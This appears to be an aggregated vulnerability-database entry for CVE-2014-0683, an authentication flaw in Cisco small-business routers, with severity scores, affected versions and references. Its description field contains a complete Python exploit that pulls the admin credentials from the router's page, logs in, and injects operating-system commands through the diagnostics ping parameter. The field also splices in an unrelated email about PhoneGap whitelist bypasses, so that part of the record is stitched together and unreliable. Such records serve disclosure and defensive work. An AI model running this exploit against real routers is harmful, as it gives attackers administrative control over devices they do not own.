ID

VAR-201403-0204


CVE

CVE-2014-0683


TITLE

plural Cisco Wireless-N VPN Vulnerabilities that can gain management access in product firmware

Trust: 0.8

sources: JVNDB: JVNDB-2014-001579

DESCRIPTION

The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. An attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits may lead to other attacks. This issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2 ##### ## Cisco RV110W Password Disclosure and OS Command Execute. ### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.) # Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute # Date: 2018-08 # Exploit Author: RySh # Vendor Homepage: https://www.cisco.com/ # Version: 1.1.0.9 # Tested on: RV110W 1.1.0.9 # CVE : CVE-2014-0683, CVE-2015-6396 import os import sys import re import urllib import urllib2 import getopt import json import ssl ssl._create_default_https_context = ssl._create_unverified_context ### # Usage: ./{script_name} 192.168.1.1 443 "reboot" ### if __name__ == "__main__": IP = argv[1] PORT = argv[2] CMD = argv[3] # Get session key, Just access index page. url = 'https://' + IP + ':' + PORT + '/' req = urllib2.Request(url) result = urllib2.urlopen(req) res = result.read() # parse 'admin_pwd'! -- Get credits admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1] admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:] print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd # Get session_id by POST req2 = urllib2.Request(url + "login.cgi") req2.add_header('Origin', url) req2.add_header('Upgrade-Insecure-Requests', 1) req2.add_header('Content-Type', 'application/x-www-form-urlencoded') req2.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req2.add_header('Referer', url) req2.add_header('Accept-Encoding', 'gzip, deflate') req2.add_header('Accept-Language', 'en-US,en;q=0.9') req2.add_header('Cookie', 'SessionID=') data = {"submit_button": "login", "submit_type": "", "gui_action": "", "wait_time": "0", "change_action": "", "enc": "1", "user": admin_user, "pwd": admin_pwd, "sel_lang": "EN" } r = urllib2.urlopen(req2, urllib.urlencode(data)) resp = r.read() login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] # Execute your commands via diagnose command parameter, default command is `reboot` req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) req3.add_header('Origin', url) req3.add_header('Upgrade-Insecure-Requests', 1) req3.add_header('Content-Type', 'application/x-www-form-urlencoded') req3.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req3.add_header('Referer', url) req3.add_header('Accept-Encoding', 'gzip, deflate') req3.add_header('Accept-Language', 'en-US,en;q=0.9') req3.add_header('Cookie', 'SessionID=') data_cmd = {"submit_button": "Diagnostics", "change_action": "gozila_cgi", "submit_type": "start_ping", "gui_action": "", "traceroute_ip": "", "commit": "1", "ping_times": "3 |" + CMD + "|", "ping_size": "64", "wait_time": "4", "ping_ip": "127.0.0.1", "lookup_name": "" } r = urllib2.urlopen(req3, urllib.urlencode(data_cmd)) . The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. As there has been no response, we are re-posting it here to alert the general public of the inherent vulnerabilities in Apache Cordova/PhoneGap. ############################################################################################## Dear PhoneGap contributors, PhoneGap\x92s domain whitelisting for accessing native resources is broken and can be bypassed. These vulnerabilities can be exploited by any third-party domain loaded inside an iframe (e.g., malicious ad scripts). Below, we give a brief summary of the vulnerabilities. You can find more details in the paper <http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf>. 1. Domain whitelisting on Android (before API 11) and Windows Phone 7 and 8 relies on the URL interception call that does not intercept iframe and XMLHttpRequest URLs. Consequently, it does not restrict which domains can be loaded in iframes. Any script inside an iframe can directly use PhoneGap\x92s internal JavaScript interfaces to the Java objects and access native resources: for example, by calling execute = cordova.require('cordova/exec'); var opts = cordova.require ('cordova/plugin/ ContactFindOptions' ); and directly operating on these objects. 2. A malicious script running in an iframe can dynamically choose any of PhoneGap\x92s vulnerable bridge mechanisms at runtime (e.g. addJavascriptInterface or loadUrl on Android) and use it to bypass the domain whitelist. We call this the chosen-bridge attack. 3. PhoneGap\x92s whitelisting check on Android is incorrect - it misses an anchor at the end of the regular expression: this.whiteList.add(Pattern.compile("\x88https?://(.*\\.)?" + origin)); For example, if foo.com is whitelisted, foo.com.evil.com will pass the check. 4. PhoneGap\x92s domain whitelisting on Android (API 11 or highler) and iOS does not adhere to the same-origin policy. Third-party scripts included using <script> tags are blocked unless their source domain is whitelisted, even though these scripts execute in the origin of the hosting page, not their source origin. 5. Instead of just blocking access to bridges from non-whitelisted domains, PhoneGap completely blocks these domains from being loaded in the browser. This prevents ad-supported apps from displaying third-party ads and destroys the look-and-feel of many Web pages. We have a proof-of-concept implementation (a 400-line patch for PhoneGap 2.9.0 on Android) called NoFrak [https://github.com/georgiev-martin/NoFrak] which fixes these vulnerabilities. NoFrak does not allow Web content from non-whitelisted domains to access native resources but still displays it correctly in the browser. If you are interested in discussing how to merge NoFrak or some parts of NoFrak to PhoneGap\x92s main branch, please let us know. Thanks, Martin, Suman, and Vitaly ##############################################################################################

Trust: 2.7

sources: NVD: CVE-2014-0683 // JVNDB: JVNDB-2014-001579 // CNVD: CNVD-2014-01575 // BID: 65988 // VULHUB: VHN-68176 // PACKETSTORM: 150781 // PACKETSTORM: 124954

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2014-01575

AFFECTED PRODUCTS

vendor:ciscomodel:rv215wscope:lteversion:1.1.0.5

Trust: 1.0

vendor:ciscomodel:rv110wscope:lteversion:1.2.0.9

Trust: 1.0

vendor:ciscomodel:rv110wscope:eqversion: -

Trust: 1.0

vendor:ciscomodel:cvr100wscope:lteversion:1.0.1.19

Trust: 1.0

vendor:ciscomodel:rv215wscope:eqversion: -

Trust: 1.0

vendor:ciscomodel:cvr100wscope:eqversion: -

Trust: 1.0

vendor:ciscomodel:cvr100w wireless-n vpn routerscope: - version: -

Trust: 0.8

vendor:ciscomodel:cvr100w wireless-n vpn routerscope:lteversion:1.0.1.19

Trust: 0.8

vendor:ciscomodel:rv110w wireless-n vpn firewallscope: - version: -

Trust: 0.8

vendor:ciscomodel:rv110w wireless-n vpn firewallscope:lteversion:1.2.0.9

Trust: 0.8

vendor:ciscomodel:rv215w wireless-n vpn routerscope: - version: -

Trust: 0.8

vendor:ciscomodel:rv215w wireless-n vpn routerscope:lteversion:1.1.0.5

Trust: 0.8

vendor:ciscomodel:rv110w wireless-n vpn firewallscope:eqversion:1.2.0.9

Trust: 0.6

vendor:ciscomodel:rv215wscope:eqversion:1.1.0.5

Trust: 0.6

vendor:ciscomodel:cvr100wscope:eqversion:1.0.1.19

Trust: 0.6

vendor:ciscomodel:rv110wscope:eqversion:1.2.0.9

Trust: 0.6

sources: CNVD: CNVD-2014-01575 // JVNDB: JVNDB-2014-001579 // CNNVD: CNNVD-201403-132 // NVD: CVE-2014-0683

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-0683
value: HIGH

Trust: 1.0

NVD: CVE-2014-0683
value: HIGH

Trust: 0.8

CNVD: CNVD-2014-01575
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201403-132
value: CRITICAL

Trust: 0.6

VULHUB: VHN-68176
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2014-0683
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2014-01575
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-68176
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2014-01575 // VULHUB: VHN-68176 // JVNDB: JVNDB-2014-001579 // CNNVD: CNNVD-201403-132 // NVD: CVE-2014-0683

PROBLEMTYPE DATA

problemtype:CWE-255

Trust: 1.9

sources: VULHUB: VHN-68176 // JVNDB: JVNDB-2014-001579 // NVD: CVE-2014-0683

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201403-132

TYPE

trust management

Trust: 0.6

sources: CNNVD: CNNVD-201403-132

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-001579

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-68176

PATCH

title:cisco-sa-20140305-rpdurl:http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd

Trust: 0.8

title:33019url:http://tools.cisco.com/security/center/viewAlert.x?alertId=33019

Trust: 0.8

title:cisco-sa-20140305-rpdurl:http://www.cisco.com/cisco/web/support/JP/112/1122/1122121_cisco-sa-20140305-rpd-j.html

Trust: 0.8

title:Multiple Cisco RV Series Routers Verify Patches That Surpass Password Disclosure Vulnerabilitiesurl:https://www.cnvd.org.cn/patchInfo/show/44175

Trust: 0.6

sources: CNVD: CNVD-2014-01575 // JVNDB: JVNDB-2014-001579

EXTERNAL IDS

db:NVDid:CVE-2014-0683

Trust: 3.5

db:EXPLOIT-DBid:45986

Trust: 1.1

db:BIDid:65988

Trust: 1.0

db:JVNDBid:JVNDB-2014-001579

Trust: 0.8

db:PACKETSTORMid:124954

Trust: 0.7

db:CNNVDid:CNNVD-201403-132

Trust: 0.7

db:CNVDid:CNVD-2014-01575

Trust: 0.6

db:CISCOid:20140305 CISCO SMALL BUSINESS ROUTER PASSWORD DISCLOSURE VULNERABILITY

Trust: 0.6

db:SECUNIAid:57119

Trust: 0.6

db:PACKETSTORMid:150781

Trust: 0.2

db:PACKETSTORMid:125567

Trust: 0.1

db:VULHUBid:VHN-68176

Trust: 0.1

sources: CNVD: CNVD-2014-01575 // VULHUB: VHN-68176 // BID: 65988 // JVNDB: JVNDB-2014-001579 // PACKETSTORM: 150781 // PACKETSTORM: 124954 // CNNVD: CNNVD-201403-132 // NVD: CVE-2014-0683

REFERENCES

url:http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140305-rpd

Trust: 2.3

url:https://www.exploit-db.com/exploits/45986/

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0683

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0683

Trust: 0.8

url:http://www.securityfocus.com/archive/1/531356

Trust: 0.6

url:http://www.internetsociety.org/ndss2014/programme#session3

Trust: 0.6

url:http://seclists.org/bugtraq/2014/jan/96

Trust: 0.6

url:http://packetstormsecurity.com/files/124954/apachecordovaphonegap-bypass.txt

Trust: 0.6

url:http://secunia.com/advisories/57119

Trust: 0.6

url:www.cisco.com

Trust: 0.3

url:https://'

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-0683

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-6396

Trust: 0.1

url:https://www.cisco.com/

Trust: 0.1

url:http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf>.

Trust: 0.1

url:https://github.com/georgiev-martin/nofrak]

Trust: 0.1

sources: CNVD: CNVD-2014-01575 // VULHUB: VHN-68176 // BID: 65988 // JVNDB: JVNDB-2014-001579 // PACKETSTORM: 150781 // PACKETSTORM: 124954 // CNNVD: CNNVD-201403-132 // NVD: CVE-2014-0683

CREDITS

Gustavo Javier Speranza

Trust: 0.3

sources: BID: 65988

SOURCES

db:CNVDid:CNVD-2014-01575
db:VULHUBid:VHN-68176
db:BIDid:65988
db:JVNDBid:JVNDB-2014-001579
db:PACKETSTORMid:150781
db:PACKETSTORMid:124954
db:CNNVDid:CNNVD-201403-132
db:NVDid:CVE-2014-0683

LAST UPDATE DATE

2024-11-23T21:55:26.947000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2014-01575date:2014-03-12T00:00:00
db:VULHUBid:VHN-68176date:2018-12-15T00:00:00
db:BIDid:65988date:2014-03-05T00:00:00
db:JVNDBid:JVNDB-2014-001579date:2014-03-07T00:00:00
db:CNNVDid:CNNVD-201403-132date:2014-03-10T00:00:00
db:NVDid:CVE-2014-0683date:2024-11-21T02:02:39.287

SOURCES RELEASE DATE

db:CNVDid:CNVD-2014-01575date:2014-03-12T00:00:00
db:VULHUBid:VHN-68176date:2014-03-06T00:00:00
db:BIDid:65988date:2014-03-05T00:00:00
db:JVNDBid:JVNDB-2014-001579date:2014-03-07T00:00:00
db:PACKETSTORMid:150781date:2018-12-14T18:00:57
db:PACKETSTORMid:124954date:2014-01-26T04:44:44
db:CNNVDid:CNNVD-201403-132date:2014-03-10T00:00:00
db:NVDid:CVE-2014-0683date:2014-03-06T11:55:05.287